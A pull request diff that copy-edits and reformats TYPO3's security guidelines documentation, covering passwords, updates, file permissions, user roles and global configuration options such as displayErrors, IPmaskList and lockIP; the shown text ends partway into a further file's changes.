### PR TITLE
[TASK] Copy-edit Security guidelines and unify RST formatting

### DIFF
--- a/Documentation/Security/GeneralGuidelines/Index.rst
+++ b/Documentation/Security/GeneralGuidelines/Index.rst
@@ -12,6 +12,9 @@ The recommendations in this chapter apply for all roles: system
 administrators, TYPO3 integrators, editors and strictly speaking even
 for (frontend) users.
 
+..  contents::
+    :local:
+
 ..  index:: pair: Security guidelines; passwords
 ..  _security-secure-passwords:
 
@@ -29,9 +32,9 @@ should be implemented in a password policy:
     and special characters.
 
 #.  Passwords should not be made up of personal information such as names,
-    nick names, pet's names, birthdays, anniversaries, etc.
+    nicknames, pet names, birthdays, anniversaries, etc.
 
-#.  Passwords should not be made out of common words that can be found in
+#.  Passwords should not be made up of common words that can be found in
     dictionaries.
 
 #.  Do not store passwords on Post-it notes, under your desk cover, in
@@ -41,42 +44,42 @@ should be implemented in a password policy:
     same password for your e-mail account, the TYPO3 backend, an online
     forum and so on.
 
-#.  Change your passwords in regular intervals but not too often (this
+#.  Change your passwords at regular intervals but not too often (this
     would make remembering the correct password too difficult) and avoid
-    to re-use the last 10 passwords.
+    re-using the last 10 passwords.
 
 #.  Do not use the "stay logged in" feature on websites and do not store
     passwords in applications like FTP clients. Enter the password
     manually every time you log in.
 
 A good rule for a secure password would be that a search engine such
-as Google should deliver no results if you would search for it. Please
-note: do not determine your passwords by this idea – this is an
-example only how cryptic a password should be.
+as Google should deliver no results if you searched for it. Please
+note: do not choose your passwords based on this idea – it is only an
+example of how cryptic a password should be.
 
 Another rule is that you should not choose a password that is too
 strong either. This sounds self-contradictory but most people will
 write down a password that is too difficult to remember – and this is
 against the rules listed above.
 
-In a perfect world you should use "trusted" computers, only. Public
+In a perfect world you should only use "trusted" computers. Public
 computers in libraries, internet cafés, and sometimes even computers
 of work colleagues and friends can be manipulated (with or without the
 knowledge of the owner) and log your keyboard input.
 
 ..  tip::
-    Since TYPO3 v12.0 password policies can be configured in backend and/or
-    frontend context. Have a look into the chapter :ref:`password-policies`.
+    Password policies can be configured in backend and/or frontend context,
+    see the :ref:`Password policies <password-policies>` chapter.
 
 ..  _security-update-operating-system:
 ..  _security-update-browser:
 
-Operating System and Browser Version
+Operating system and browser version
 ====================================
 
 Make sure that you are using up-to-date software versions of your
 browser and that you have installed the latest updates for your
-operating system (such as Microsoft Windows, Mac OS X or Linux). Check
+operating system (such as Microsoft Windows, macOS or Linux). Check
 for software updates regularly and install security patches
 immediately or at least as soon as possible.
 
@@ -85,13 +88,13 @@ Trojans, keyloggers, rootkits and other "malware".
 
 ..  _security-communication:
 
-Communication
-=============
+Communication between roles
+===========================
 
-A good communication between several roles is essential to clarify
-responsibilities and to coordinate the next steps when updates are
-required, an attacked site needs to be restored or other security-
-related actions need to be done as soon as possible.
+Good communication between several roles is essential to clarify
+responsibilities and coordinate the next steps, whether updates are
+required, an attacked site needs to be restored, or other
+security-related actions need to be taken as soon as possible.
 
 A central point of contact, for example a person or a team responsible
 for coordinating these actions, is generally a good idea. This also
@@ -100,28 +103,26 @@ can report issues.
 
 ..  _security-react-quickly:
 
-React Quickly
+React quickly
 =============
 
 TYPO3 is open source software as well as all TYPO3 extensions
-published in the TYPO3 Extension Repository (TER). This means,
+published in the TYPO3 Extension Repository (TER). This means that
 everyone can download and investigate the code base. From a security
 perspective, this usually improves the software, simply because more
-people review the code, not only a few Core developers. Currently,
-there are hundreds of developers actively involved in the TYPO3
-community and if someone discovers and reports a security issue,
-he/she will be honored by being credited in the appropriate security
-bulletin.
+people review the code, not only a few Core developers. Hundreds of
+developers are actively involved in the TYPO3 community, and if
+someone discovers and reports a security issue, they will be
+honored by being credited in the appropriate security bulletin.
 
 The open source concept also implies that everyone can compare the old
 version with the new version of the software after a vulnerability
-became public. This may give an insight to anyone who has programming
-knowledge, how to exploit the vulnerability and therefore it is
-understandable how important it is, to react quickly and fix the issue
-before someone else compromises it. In other words, it is not enough
-to receive and read the security bulletins, it is also essential to
-react as soon as possible and to update the software or deinstall the
-affected component.
+became public. This may give anyone with programming knowledge insight
+into how to exploit the vulnerability, so it is important to react
+quickly and fix the issue before someone else compromises it. In other
+words, it is not enough to receive and read the security bulletins; it
+is also essential to react as soon as possible and to update the
+software or uninstall the affected component.
 
 The security bulletins may also include specific advice such as
 configuration changes or similar. Check your individual TYPO3 instance
@@ -133,24 +134,23 @@ and follow these recommendations.
 Keep the TYPO3 Core up-to-date
 ==============================
 
-As described in :ref:`TYPO3 versions <security-typo3-versions>` chapter, a
-new version of TYPO3 can either be a major update (e.g. from version 10.x.x to
-version 11.x.x), a minor update (e.g. from version 11.4.x to version
-11.5.x) or a maintenance/bugfix/security release (e.g. from version
-11.5.11 to 11.5.12).
+As described in the :ref:`TYPO3 versions <security-typo3-versions>`
+chapter, a new version of TYPO3 can either be a major update (e.g. from
+version 13.x.x to version 14.x.x), a minor update (e.g. from version
+14.2.x to version 14.3.x) or a maintenance/bugfix/security release
+(e.g. from version 14.3.0 to 14.3.1).
 
-In most cases, a maintenance/bugfix/security update is a no-brainer,
-see chapter ::ref:`Patch/Bugfix updates <t3coreapi:minor>`
+In most cases, a maintenance/bugfix/security update is a no-brainer;
+see the chapter :ref:`Patch/Bugfix updates <t3coreapi:minor>`
 for further details.
 
 When you extract the archive file of new TYPO3 sources into the
 existing install directory (e.g. the web root of your web server) and
-update the symbolic links, pointing to the directory of the new version,
+update the symbolic links to point to the directory of the new version,
 do not forget to **delete** the old and possibly insecure TYPO3 Core
-version. Failing doing this creates the risk of leaving the source code
-of the previous TYPO3 version on the system and as a consequence, the
-insecure code may still be accessible and a security vulnerability
-possibly exploitable.
+version. Failing to do this creates the risk of leaving the source code
+of the previous TYPO3 version on the system, so the insecure code may
+still be accessible and result in an exploitable security vulnerability.
 
 Another option is to store the extracted TYPO3 sources outside of the
 web root directory (so they are not accessible via web requests) as
@@ -160,10 +160,10 @@ the correct and secure TYPO3 version.
 ..  index:: pair: Security guidelines; Extensions update
 ..  _security-updating-extensions:
 
-Keep TYPO3 Extensions Up-to-date
+Keep TYPO3 extensions up-to-date
 ================================
 
-Do not rely on publicly released security announcements only. Reading
+Do not rely only on publicly released security announcements. Reading
 the official security bulletins and updating TYPO3 extensions which
 are listed in the bulletins is an essential task but not sufficient to
 have a "secure" system.
@@ -185,20 +185,20 @@ versions or TYPO3 extensions.
 ..  todo: Update this to include Composer
 
 The recommended way to update TYPO3 extensions is to use TYPO3's
-internal Extension Manager (EM). The EM takes care of the download of
-the extension source code, extracts the archive and stores the files in
-the correct place, overwriting an existing old version by default. This
-ensures, the source code containing a possible security vulnerability
-will be removed from server when a new version of an extension is
+internal Extension Manager (EM). The EM downloads the extension source
+code, extracts the archive and stores the files in the correct place,
+overwriting an existing old version by default. This ensures that the
+source code containing a possible security vulnerability will be
+removed from the server when a new version of an extension is
 installed.
 
 When a system administrator decides to create a copy of the directory of
-an existing insecure extension, before installing the new version, he/she
-often introduces the risk of leaving the (insecure) copy on the web
+an existing insecure extension before installing the new version, they
+often introduce the risk of leaving the (insecure) copy on the web
 server. For example:
 
 ..  code-block:: none
-    :caption: Remove old extensions, dont rename
+    :caption: Remove old extensions, don't rename
 
     typo3conf/ext/insecure_extension.bak
     typo3conf/ext/insecure_extension.delete_me
@@ -226,13 +226,13 @@ requirements.
 
 A website that is already "live" and publicly accessible should not be
 used for these purposes. New developments and tests should be done on
-so called "staging servers" which are used as a temporary stage and
+so-called "staging servers" which are used as a temporary stage and
 could be messed up without an impact on the "live" site. Only
 relevant/required, tested and reviewed clean code should then be
 implemented on the production site.
 
-This is not security-related on the first view but "tests" are often
-grossly negligent implemented, without security aspects in mind.
-Staging servers also help keeping the production sites slim and clean
+This is not security-related at first glance, but "tests" are often
+implemented with gross negligence, without security aspects in mind.
+Staging servers also help keep the production sites slim and clean
 and reduce maintenance work (e.g. updating extensions which are not in
 use).

--- a/Documentation/Security/GuidelinesAdministrators/Backups.rst
+++ b/Documentation/Security/GuidelinesAdministrators/Backups.rst
@@ -12,9 +12,7 @@ recover from data loss, attacks, or misconfiguration. However, backups themselve
 can also be a security risk if stored in the web root or transmitted without encryption.
 
 For full recommendations on what to back up, how to store backups securely, and how
-to automate and test them, see:
-
-For full recommendations on how to handle backups securely, see
+to automate and test them, see
 :ref:`Backup strategy <administration-backups>`.
 
 ..  _security-backup-risk:

--- a/Documentation/Security/GuidelinesAdministrators/FileDirectoryPermissions.rst
+++ b/Documentation/Security/GuidelinesAdministrators/FileDirectoryPermissions.rst
@@ -31,10 +31,10 @@ permission strategy.
 
 ..  contents:: Table of contents
 
-.. _file-permissions-composer:
+..  _file-permissions-composer:
 
-Composer-based installations
-============================
+Composer-based installations: file permissions
+==============================================
 
 In Composer-based TYPO3 installations, the document root is typically a
 :file:`public/` directory. Core files, extensions, and the :file:`vendor/` directory
@@ -65,10 +65,10 @@ reside outside the web root, improving security by design.
     read-only for the web server.
 
 
-.. _file-permissions-classic:
+..  _file-permissions-classic:
 
-Classic-mode installations
-==========================
+Classic-mode installations: file permissions
+============================================
 
 In classic TYPO3 installations, all TYPO3 files (Core, extensions, uploads) are located
 inside the web server's document root. This increases the risk of file exposure or
@@ -84,7 +84,7 @@ accidental manipulation, making secure filesystem permissions essential.
     -   :file:`fileadmin/`
     -   :file:`typo3temp/`
 
-    - Only grant write access to subdirectories within :file:`typo3conf/` as needed:
+    -   Only grant write access to subdirectories within :file:`typo3conf/` as needed:
 
     -   :file:`typo3conf/ext/`, :file:`typo3conf/autoload/`, :file:`typo3conf/PackageStates.php`:
         Required if you want to install or update extensions using the Extension Manager.

--- a/Documentation/Security/GuidelinesAdministrators/FileExtensionHandling.rst
+++ b/Documentation/Security/GuidelinesAdministrators/FileExtensionHandling.rst
@@ -1,10 +1,12 @@
+:navigation-title: File extension handling
+
 ..  include:: /Includes.rst.txt
 ..  index:: pair: Security guidelines; File extensions
 ..  _security-file-extension-handling:
 
-=======================
-File extension handling
-=======================
+=======================================================
+Avoid MIME-type confusion from multiple file extensions
+=======================================================
 
 Most web servers have a default configuration
 mapping file extensions like `.html` or `.txt`

--- a/Documentation/Security/GuidelinesAdministrators/IntegrityOfTypo3Packages.rst
+++ b/Documentation/Security/GuidelinesAdministrators/IntegrityOfTypo3Packages.rst
@@ -3,9 +3,9 @@
 ..  include:: /Includes.rst.txt
 ..  _security-integrity-packages:
 
-===============================
+==============================
 Verify integrity of TYPO3 code
-===============================
+==============================
 
 Ensuring that the TYPO3 source code has not been tampered with is very important
 for security reasons. TYPO3 can either be installed via Composer or by downloading
@@ -13,8 +13,8 @@ a prebuilt package. Each method requires different integrity checks.
 
 ..  _security-integrity-packages-composer:
 
-Composer-based installations
-============================
+Composer-based installations: verifying code integrity
+======================================================
 
 When using Composer, TYPO3 and its dependencies are downloaded directly by
 Composer from trusted sources such as `packagist.org` and `packages.typo3.org`.
@@ -35,8 +35,8 @@ to the production environment.
 
 ..  _security-integrity-packages-classic:
 
-Classic (non-Composer) installations
-====================================
+Classic (non-Composer) installations: verifying code integrity
+==============================================================
 
 If installing TYPO3 via a downloaded archive (ZIP, tar.gz), verify the
 SHA2-256 checksum before extracting. Only download from the official site:

--- a/Documentation/Security/GuidelinesAdministrators/OtherServices.rst
+++ b/Documentation/Security/GuidelinesAdministrators/OtherServices.rst
@@ -1,7 +1,7 @@
 :navigation-title: Insecure Uploads
 
-.. include:: /Includes.rst.txt
-.. _security-other-services:
+..  include:: /Includes.rst.txt
+..  _security-other-services:
 
 ===========================
 Avoid insecure file uploads

--- a/Documentation/Security/GuidelinesAdministrators/RestrictAccessToFiles.rst
+++ b/Documentation/Security/GuidelinesAdministrators/RestrictAccessToFiles.rst
@@ -21,8 +21,8 @@ at the operating system level, see
 
 ..  _security-restrict-access-server-level-composer:
 
-Composer-based installations
-============================
+Composer-based installations: restricting file access
+=====================================================
 
 For Composer-based TYPO3 installations, the public document root is typically
 the :file:`public/` directory. All web-accessible files are
@@ -49,8 +49,8 @@ sensitive files, eliminating the need for complex blacklisting rules.
 
 ..  _security-restrict-access-server-level-classic:
 
-Classic-mode installations
-==========================
+Classic-mode installations: restricting file access
+===================================================
 
 In classic TYPO3 installations (without Composer), all files are contained in the
 web root directory. This increases the risk of accidental exposure of internal

--- a/Documentation/Security/GuidelinesAdministrators/RoleDefinition.rst
+++ b/Documentation/Security/GuidelinesAdministrators/RoleDefinition.rst
@@ -1,9 +1,9 @@
 :navigation-title: Role Definition
 
-.. include:: /Includes.rst.txt
-.. index::
-   Security guidelines; Administrator role
-.. _security-administrator-definition:
+..  include:: /Includes.rst.txt
+..  index::
+    Security guidelines; Administrator role
+..  _security-administrator-definition:
 
 ================================================
 Role definition: What is a system administrator?

--- a/Documentation/Security/GuidelinesEditors/Index.rst
+++ b/Documentation/Security/GuidelinesEditors/Index.rst
@@ -18,8 +18,8 @@ awareness directly affect the security of the system.
     pair: Security guidelines; Editor role
 ..  _security-editor-definition:
 
-Role definition
-===============
+Editor role definition
+======================
 
 Typically, a software development company or web design agency
 develops the initial TYPO3 website for the client. After the delivery,
@@ -49,17 +49,17 @@ Advanced tasks of editors are for example the compilation and
 publishing of newsletters, the maintenance of frontend user records
 and/or export of data (e.g. online shop orders).
 
-Editors usually do not change the layout of the website, they do not
-set up the system, new backend user accounts, new site functionality
-(for example, they do not install, update or remove extensions), they
-do not need to have programming, database or HTML knowledge and they
-do not configure the TYPO3 instance by changing TypoScript code or templates.
+Editors usually do not change the layout of the website, set up the system,
+or add new backend user accounts or site functionality (for example, they
+do not install, update or remove extensions). They also do not need
+programming, database or HTML knowledge, and they do not configure the
+TYPO3 instance by changing TypoScript code or templates.
 
 
 ..  _security-editor-rules:
 
-General rules
-=============
+General rules for editors
+=========================
 
 The :ref:`General Guidelines <security-general-guidelines>` also apply to editors
 – especially the section "Secure passwords" and "Operating system and browser version".
@@ -80,8 +80,8 @@ Backend access
 
 ..  _security-backend-access-username:
 
-Username
---------
+Backend username
+----------------
 
 Generic usernames such as "editor", "webmaster", "cms" or similar are
 not recommended. Shared user accounts are not recommended either:
@@ -92,8 +92,8 @@ limited in TYPO3 and they should not add additional costs.
 
 ..  _security-backend-access-password:
 
-Password
---------
+Backend password
+----------------
 
 Please read the :ref:`chapter about secure passwords <security-secure-passwords>`.
 If your current TYPO3 password does not match the rules explained above, change your

--- a/Documentation/Security/GuidelinesExtensionDevelopment/Index.rst
+++ b/Documentation/Security/GuidelinesExtensionDevelopment/Index.rst
@@ -62,7 +62,7 @@ applies to Extbase queries, Doctrine DBAL :ref:`QueryBuilder
 ..  _trusted-properties:
 
 Trusted properties (Extbase Only)
-==================================
+=================================
 
 ..  danger::
 

--- a/Documentation/Security/GuidelinesIntegrators/AccessPrivileges.rst
+++ b/Documentation/Security/GuidelinesIntegrators/AccessPrivileges.rst
@@ -1,18 +1,18 @@
-.. include:: /Includes.rst.txt
-.. index:: Security guidelines; Users and access
-.. _security-access-privileges:
+..  include:: /Includes.rst.txt
+..  index:: Security guidelines; Users and access
+..  _security-access-privileges:
 
 ===========================
 Users and access privileges
 ===========================
 
 
-.. index:: pair: Security guidelines; Backend user
+..  index:: pair: Security guidelines; Backend user
 
 ..  _security-access-privileges-backend:
 
-Backend
-=======
+Backend user access privileges
+==============================
 
 TYPO3 offers a very sophisticated and complex access concept: you can
 define permissions on a user-level, on a group-level, on pages, on
@@ -58,12 +58,12 @@ users that are allowed to continue using the system.
 
     Screenshot showing the screen to set an expiry date for a backend user
 
-.. index:: pair: Security guidelines; Frontend users
+..  index:: pair: Security guidelines; Frontend users
 
 ..  _security-access-privileges-frontend:
 
-Frontend
-========
+Frontend user access privileges
+===============================
 
 Access to pages and content in the TYPO3 frontend can be configured with
 frontend user groups. Similar suggestions like for backend users also apply here.

--- a/Documentation/Security/GuidelinesIntegrators/ContentElements.rst
+++ b/Documentation/Security/GuidelinesIntegrators/ContentElements.rst
@@ -1,18 +1,20 @@
-.. include:: /Includes.rst.txt
-.. index::
-   pair: Security guidelines; Content elements
-   pair: Security guidelines; RTE
-.. _security-content-elements:
+:navigation-title: Content elements
 
-================
-Content elements
-================
+..  include:: /Includes.rst.txt
+..  index::
+    pair: Security guidelines; Content elements
+    pair: Security guidelines; RTE
+..  _security-content-elements:
 
-.. todo:: Needs review: Outdated: This section is outdated and needs an update.
+===========================================
+Security risks of raw HTML content elements
+===========================================
 
-.. warning::
+..  todo:: Needs review: Outdated: This section is outdated and needs an update.
 
-   The information on this page is outdated!
+..  warning::
+
+    The information on this page is outdated!
 
 
 Besides the :ref:`low-level extensions <security-extensions-low-level>`, there
@@ -38,12 +40,12 @@ consider disabling the function by configuring the buttons shown in
 the `RTE`. The :ref:`page TSconfig <t3tsref:pageTsRte>` enables you to
 list all buttons visible in the RTE by using the following TypoScript:
 
-.. code-block:: typoscript
+..  code-block:: typoscript
 
-   RTE.default {
-     showButtons = ...
-     hideButtons = ...
-   }
+    RTE.default {
+      showButtons = ...
+      hideButtons = ...
+    }
 
 In order to disable the button "toggle text mode", add "chMode" to the
 hideButtons list. The TSconfig/RTE (Rich Text Editor) documentation

--- a/Documentation/Security/GuidelinesIntegrators/Extensions.rst
+++ b/Documentation/Security/GuidelinesIntegrators/Extensions.rst
@@ -1,10 +1,12 @@
-.. include:: /Includes.rst.txt
-.. index:: pair: Security guidelines; Extensions
-.. _security-extensions:
+:navigation-title: Extensions
 
-================
-TYPO3 extensions
-================
+..  include:: /Includes.rst.txt
+..  index:: pair: Security guidelines; Extensions
+..  _security-extensions:
+
+======================================
+Security considerations for extensions
+======================================
 
 As already mentioned above, most of the security issues have been
 discovered in TYPO3 extensions, not in the TYPO3 Core . Due to the fact
@@ -51,22 +53,22 @@ Thus, it depends on the specific case and project, and the intention
 of listing the points below is more to raise the awareness of possible
 risks.
 
-* Do not install extensions or versions marked as `alpha` or `obsolete`:
-  The developer classified the code as a early version, preview,
-  prototype, proof-of-concept and/or as not maintained – nothing you
-  should install on a production site.
+-   Do not install extensions or versions marked as `alpha` or `obsolete`:
+    The developer classified the code as an early version, preview,
+    prototype, proof-of-concept and/or as not maintained – nothing you
+    should install on a production site.
 
-- Be very careful when using extensions or versions marked as `beta`:
-  According to the developer, this version of the extension is still in
-  development, so it is unlikely that any security-related tests or
-  reviews have been undertaken so far.
+-   Be very careful when using extensions or versions marked as `beta`:
+    According to the developer, this version of the extension is still in
+    development, so it is unlikely that any security-related tests or
+    reviews have been undertaken so far.
 
-- Be careful with extensions and versions marked as `stable`, but not
-  reviewed by the TYPO3 Security Team.
+-   Be careful with extensions and versions marked as `stable`, but not
+    reviewed by the TYPO3 Security Team.
 
-- Check every extension and extension update before you install it on a
-  production site and review it in regards to security, see
-  :ref:`Use staging servers for developments and tests <security-staging-servers>`.
+-   Check every extension and extension update before you install it on a
+    production site and review it in regards to security, see
+    :ref:`Use staging servers for developments and tests <security-staging-servers>`.
 
 
 ..  _security-extensions-executable-binaries-shipped:
@@ -116,7 +118,7 @@ extensions from the system (not only unload/deinstall them). The
 administrator backend account is required.
 
 
-.. _security-extensions-low-level:
+..  _security-extensions-low-level:
 
 Low-level extensions
 ====================

--- a/Documentation/Security/GuidelinesIntegrators/GlobalTypo3Options.rst
+++ b/Documentation/Security/GuidelinesIntegrators/GlobalTypo3Options.rst
@@ -1,8 +1,8 @@
-.. include:: /Includes.rst.txt
-.. index::
-   pair: Security guidelines; Global TYPO3 configuration
-   pair: Security guidelines; Debugging
-.. _security-global-typo3-options:
+..  include:: /Includes.rst.txt
+..  index::
+    pair: Security guidelines; Global TYPO3 configuration
+    pair: Security guidelines; Debugging
+..  _security-global-typo3-options:
 
 ==================================
 Global TYPO3 configuration options
@@ -18,37 +18,37 @@ usage depends on your specific site and requirements).
     :local:
 
 
-.. _security-global-typo3-options-displayErrors:
+..  _security-global-typo3-options-displayErrors:
 
-displayErrors
-=============
+`displayErrors`
+===============
 
 This :ref:`configuration option <typo3ConfVars_sys_displayErrors>` controls
 whether PHP errors should be displayed or not (information disclosure). Possible
 values are: `-1`, `0`, `1` (integer) with the following meaning:
 
 `-1`
-   This overrides the PHP setting :php:`display_errors`.
-   If :ref:`devIPmask <security-global-typo3-options-devIpMask>` matches the user's IP address the
-   configured :php:`debugExceptionHandler` is used for exceptions,
-   if not, `productionExceptionHandler` will be used. This is the default setting.
+    This overrides the PHP setting :php:`display_errors`.
+    If :ref:`devIPmask <security-global-typo3-options-devIpMask>` matches the user's IP address the
+    configured :php:`debugExceptionHandler` is used for exceptions,
+    if not, `productionExceptionHandler` will be used. This is the default setting.
 
 `0`
-   This suppresses any PHP error messages, overrides the value of `exceptionalErrors`
-   and sets it to `0` (no errors are turned into exceptions), the configured
-   `productionExceptionHandler` is used as exception handler.
+    This suppresses any PHP error messages, overrides the value of `exceptionalErrors`
+    and sets it to `0` (no errors are turned into exceptions), the configured
+    `productionExceptionHandler` is used as exception handler.
 
 `1`
-   This shows PHP error messages with the registered error handler.
-   The configured `debugExceptionHandler` is used as exception handler.
+    This shows PHP error messages with the registered error handler.
+    The configured `debugExceptionHandler` is used as exception handler.
 
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['SYS']['displayErrors']`
 
 
-.. _security-global-typo3-options-devIpMask:
+..  _security-global-typo3-options-devIpMask:
 
-devIPmask
-=========
+`devIPmask`
+===========
 
 The :ref:`option devIPmask <typo3ConfVars_sys_devIPmask>` defines a comma-separated list
 of IP addresses which will allow development output to display (information
@@ -61,10 +61,10 @@ which means "localhost" only.
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['SYS']['devIPmask']`
 
 
-.. _security-global-typo3-options-fileDenyPattern:
+..  _security-global-typo3-options-fileDenyPattern:
 
-fileDenyPattern
-===============
+`fileDenyPattern`
+=================
 
 The :ref:`fileDenyPattern <typo3ConfVars_be_fileDenyPattern>` is a
 Perl-compatible regular expression that (if it matches a file name) will prevent
@@ -86,10 +86,10 @@ it only gained access to the TYPO3 backend with a normal, unprivileged user acco
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['BE']['fileDenyPattern']`
 
 
-.. _security-global-typo3-options-IPmaskList:
+..  _security-global-typo3-options-IPmaskList:
 
-IPmaskList
-==========
+`IPmaskList`
+============
 
 Some TYPO3 instances are maintained by a selected group of integrators
 and editors who only work from a specific IP range or (in an ideal
@@ -104,79 +104,79 @@ The use of wildcards is also possible to specify a network. The following
 example opens the backend for users with the IP address `123.45.67.89` and from
 the network `192.168.xxx.xxx`:
 
-.. code-block:: php
-  :caption: config/system/additional.php | typo3conf/system/additional.php
+..  code-block:: php
+    :caption: config/system/additional.php | typo3conf/system/additional.php
 
-  $GLOBALS['TYPO3_CONF_VARS']['BE']['IPmaskList'] = 123.45.67.89,192.168.*.*
+    $GLOBALS['TYPO3_CONF_VARS']['BE']['IPmaskList'] = 123.45.67.89,192.168.*.*
 
 The default value is an empty string.
 
-.. _security-global-typo3-options-lockIP:
+..  _security-global-typo3-options-lockIP:
 
-lockIP / lockIPv6
-=================
+`lockIP` / `lockIPv6`
+=====================
 
 If a frontend or backend user logs into TYPO3, the user's session can be locked
 to its IP address. The `lockIP` configuration for IPv4 and `lockIPv6` for IPv6
 control how many parts of the IP address have to match with the IP address used
 at authentication time.
 
-.. attention::
+..  attention::
 
-   IP locking breaks modern IPv6 setups because of the
-   `Fast Fallback aka. Happy Eyeballs <https://en.wikipedia.org/wiki/Happy_Eyeballs>`__
-   algorithm that can cause users to jump between IPv4 and IPv6
-   arbitrarily. Enabling an IP lock should be a very conscious decision. Therefore,
-   this is disabled by default.
+    IP locking breaks modern IPv6 setups because of the
+    `Fast Fallback aka. Happy Eyeballs <https://en.wikipedia.org/wiki/Happy_Eyeballs>`__
+    algorithm that can cause users to jump between IPv4 and IPv6
+    arbitrarily. Enabling an IP lock should be a very conscious decision. Therefore,
+    this is disabled by default.
 
 
 Possible values for **IPv4** are: `0`, `1`, `2`, `3` or `4` (integer)
 with the following meaning:
 
 `0`
-   Disable IP locking entirely.
+    Disable IP locking entirely.
 
 `1`
-   Only the first part of the IPv4 address needs to match, e.g. `123.xxx.xxx.xxx`.
+    Only the first part of the IPv4 address needs to match, e.g. `123.xxx.xxx.xxx`.
 
 `2`
-   Only the first and second part of the IPv4 address need to match, e.g. `123.45.xxx.xxx`.
+    Only the first and second part of the IPv4 address need to match, e.g. `123.45.xxx.xxx`.
 
 `3`
-   Only the first, second and third part of the IPv4 address need to match, e.g. `123.45.67.xxx`.
+    Only the first, second and third part of the IPv4 address need to match, e.g. `123.45.67.xxx`.
 
 `4`
-   The complete IPv4 address has to match (e.g. `123.45.67.89`).
+    The complete IPv4 address has to match (e.g. `123.45.67.89`).
 
 Possible values for **IPv6** are: `0`, `1`, `2`, `3`, `4`,  `5`,  `6`, `7`, `8` (integer)
 with the following meaning:
 
 `0`
-   Disable IP locking entirely.
+    Disable IP locking entirely.
 
 `1`
-   Only the first block (16 bits) of the IPv6 address needs to match, e.g. `2001:`
+    Only the first block (16 bits) of the IPv6 address needs to match, e.g. `2001:`
 
 `2`
-   The first two blocks (32 bits) of the IPv6 address need to match, e.g. `2001:0db8`.
+    The first two blocks (32 bits) of the IPv6 address need to match, e.g. `2001:0db8`.
 
 `3`
-   The first three blocks (48 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3`
+    The first three blocks (48 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3`
 
 `4`
-   The first four blocks (64 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3`
+    The first four blocks (64 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3`
 
 `5`
-   The first five blocks (80 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3:1319`
+    The first five blocks (80 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3:1319`
 
 `6`
-   The first six blocks (96 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3:1319:8a2e`
+    The first six blocks (96 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3:1319:8a2e`
 
 `7`
-   The first seven blocks (112 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3:1319:8a2e:0370`
+    The first seven blocks (112 bits) of the IPv6 address need to match, e.g. `2001:0db8:85a3:08d3:1319:8a2e:0370`
 
 `8`
-   The full IPv6 address has to match, e.g. `2001:0db8:85a3:08d3:1319:8a2e:0370:7344`
+    The full IPv6 address has to match, e.g. `2001:0db8:85a3:08d3:1319:8a2e:0370:7344`
 
 If your users experience that their sessions sometimes drop out, it
 might be because of a changing IP address (this may happen with
@@ -199,10 +199,10 @@ four PHP variables are available:
 * :php:`$GLOBALS['TYPO3_CONF_VARS']['BE']['lockIPv6']`
 
 
-.. _security-global-typo3-options-lockSSL:
+..  _security-global-typo3-options-lockSSL:
 
-lockSSL
-=======
+`lockSSL`
+=========
 
 As described in :ref:`encrypted client/server communication
 <security-encrypted-client-server-connection>`, the use of `https://` scheme
@@ -218,10 +218,10 @@ values are: `true`, `false` (boolean) with the following meaning:
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['BE']['lockSSL']`
 
 
-.. _security-global-typo3-options-trustedHostsPattern:
+..  _security-global-typo3-options-trustedHostsPattern:
 
-trustedHostsPattern
-===================
+`trustedHostsPattern`
+=====================
 
 TYPO3 uses the HTTP header `Host:` to generate absolute URLs in several
 places such as 404 handling, http(s) enforcement, password reset links
@@ -247,10 +247,10 @@ or SSL termination scenarios.
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern']`
 
 
-.. _security-global-typo3-options-warning-email-addr:
+..  _security-global-typo3-options-warning-email-addr:
 
-warning_email_addr
-==================
+`warning_email_addr`
+====================
 
 The email address defined in :ref:`warning_email_addr
 <typo3ConfVars_be_warning_email_addr>` will receive notifications, whenever an
@@ -263,10 +263,10 @@ The default value is an empty string.
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['BE']['warning_email_addr']`
 
 
-.. _security-global-typo3-options-warning-mode:
+..  _security-global-typo3-options-warning-mode:
 
-warning_mode
-============
+`warning_mode`
+==============
 
 This :ref:`setting <typo3ConfVars_be_warning_mode>` specifies if emails should
 be send to :ref:`warning_email_addr
@@ -276,12 +276,12 @@ login.
 The value in an integer:
 
 `0`
-   Do not send notification emails upon backend login (default)
+    Do not send notification emails upon backend login (default)
 
 `1`
-   Send a notification email every time a backend user logs in
+    Send a notification email every time a backend user logs in
 
 `2`
-   Send a notification email every time an **admin** backend user logs in
+    Send a notification email every time an **admin** backend user logs in
 
 The PHP variable reads: :php:`$GLOBALS['TYPO3_CONF_VARS']['BE']['warning_mode']`

--- a/Documentation/Security/GuidelinesIntegrators/Index.rst
+++ b/Documentation/Security/GuidelinesIntegrators/Index.rst
@@ -33,12 +33,12 @@ for integrators:
     ContentElements
 
 ..  index::
-   Security guidelines; User roles
-   Security guidelines; Integrator role
+    Security guidelines; User roles
+    Security guidelines; Integrator role
 ..  _security-integrator-definition:
 
-Role definition
-===============
+Integrator role definition
+==========================
 
 A TYPO3 integrator develops the template for a website, selects,
 imports, installs and configures extensions and sets up access rights
@@ -69,8 +69,8 @@ administrator and often one person is in both roles.
 ..  index:: Security guidelines; General rules
 ..  _security-integrator-rules:
 
-General rules
-=============
+General rules for TYPO3 integrators
+===================================
 
 All :ref:`general rules <security-administrators>` for a system administrator
 also apply for a TYPO3 integrator. One of the most important rules is to change the

--- a/Documentation/Security/GuidelinesIntegrators/InstallTool.rst
+++ b/Documentation/Security/GuidelinesIntegrators/InstallTool.rst
@@ -1,26 +1,28 @@
-.. include:: /Includes.rst.txt
-.. index::
-   Security guidelines; Install tool
-   File; typo3conf/ENABLE_INSTALL_TOOL
